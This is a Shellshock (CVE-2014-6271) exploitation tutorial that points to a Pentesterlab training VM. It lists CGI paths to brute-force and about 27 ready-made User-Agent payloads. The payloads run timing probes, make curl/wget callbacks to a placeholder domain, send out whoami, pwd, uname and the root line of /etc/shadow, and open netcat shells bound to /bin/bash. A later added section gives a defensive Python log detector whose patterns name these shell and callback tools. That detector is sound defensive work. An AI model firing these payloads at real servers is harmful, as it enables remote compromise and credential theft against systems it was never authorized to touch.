CVE-2014-6271 Shellshock Exploitation and Remote Shell Tutorial

A quick tutorial on how to exploit Shellshock (CVE-2014-6271) using timing attacks, remote confirmation and gaining a shell back to the host. CC: [email protected] https://twitter.com/CrowdShield Download the Pentesterlab Shellshock VM here: https://pentesterlab.com/exercises/cve-2014-6271

Shellshock CGI-BIN Brute Force List:

/
/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/php5-cli
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/status
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5
/phppath/cgi_wrapper
/phppath/php

Shellshock User-Agent Strings:

() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=4"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://yourdomain/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 3 && curl http://yourdomain/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://yourdomain/shellshock.txt?sleep=9&?vuln=9"
() { :;}; echo vulnerable 10
() { :;}; wget http://yourdomain/shellshock.txt?vuln=11
() { :;}; curl http://yourdomain/shellshock.txt?vuln=12
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://yourdomain/shellshock.txt?vuln=13;curl http://yourdomain/shellshock.txt?vuln=15;\");'
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://yourdomain/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://yourdomain/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
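From the defender's side, every string above shares one signature: the bash function-definition prefix `() {` arriving in an HTTP header (typically User-Agent or Referer) aimed at a CGI path. The following is an added example, not part of the original tutorial or the Pentesterlab exercise, that parses Apache combined-format access log lines, flags that prefix in the header fields, notes whether the request targeted one of the CGI path prefixes from the brute-force list, and labels the payload style (timing probe, out-of-band callback, listener, plain command). The log lines, IP addresses and the `CGI_PREFIXES` tuple are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# The Shellshock trigger is an exported bash function definition at the start
# of an environment variable value. The vulnerable parser tolerates whitespace
# between "()" and "{", so the pattern allows it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed from the CGI path list above; a hit raises confidence that the
# request reached a handler that could spawn bash, but the header is the verdict.
CGI_PREFIXES = ("/cgi-bin/", "/cgi-sys/", "/cgi-mod/", "/cgi-bin-sdb/", "/phppath/")

# Apache "combined" log format. Apache writes a literal quote inside a header
# as \" so the referer/user-agent groups accept backslash escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample log: two Shellshock probes (one via User-Agent, one via
# Referer), one ordinary browser hit and one benign curl request to a CGI path.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \\"sleep 6 && echo vulnerable 6\\""
203.0.113.7 - - [25/Sep/2014:10:01:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "() { :;}; echo vulnerable 10" "Mozilla/5.0"
198.51.100.4 - - [25/Sep/2014:10:02:15 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [25/Sep/2014:10:03:00 +0000] "GET /cgi-bin/env.cgi HTTP/1.1" 200 300 "-" "curl/7.35.0"
"""


def classify(payload: str) -> str:
    """Label the payload style so triage can prioritise (listener > callback > probe)."""
    if re.search(r"\bnc\b.*-e", payload):
        return "listener/shell"
    if re.search(r"\b(curl|wget)\b\s+https?://", payload):
        return "out-of-band callback"
    if re.search(r"\bsleep\s+\d+", payload):
        return "timing probe"
    return "command execution"


def detect(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for one log line, or None if it shows no Shellshock pattern."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not combined format; a real pipeline would count these
    for field, header in (("ua", "User-Agent"), ("referer", "Referer")):
        value = m.group(field)
        if SHELLSHOCK_RE.search(value):
            path = m.group("path")
            return {
                "source": m.group("ip"),
                "timestamp": m.group("ts"),
                "path": path,
                "cgi_path": path.startswith(CGI_PREFIXES),
                "header": header,
                "category": classify(value),
                "payload": value,
            }
    return None


def scan(log_text: str) -> List[Dict[str, object]]:
    """Scan a whole log and return findings in log order."""
    return [f for f in (detect(l) for l in log_text.splitlines()) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['timestamp']} {finding['source']} {finding['header']} -> "
              f"{finding['path']} [{finding['category']}] cgi={finding['cgi_path']}")
```

Note that the ordinary `curl/7.35.0` request to `/cgi-bin/env.cgi` is not flagged: the path list alone is a scanner hint, and alerting on it would drown the real signal. Pair this log-side check with the host-side fix (a bash build whose function-export parsing no longer executes trailing commands) rather than relying on either one.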
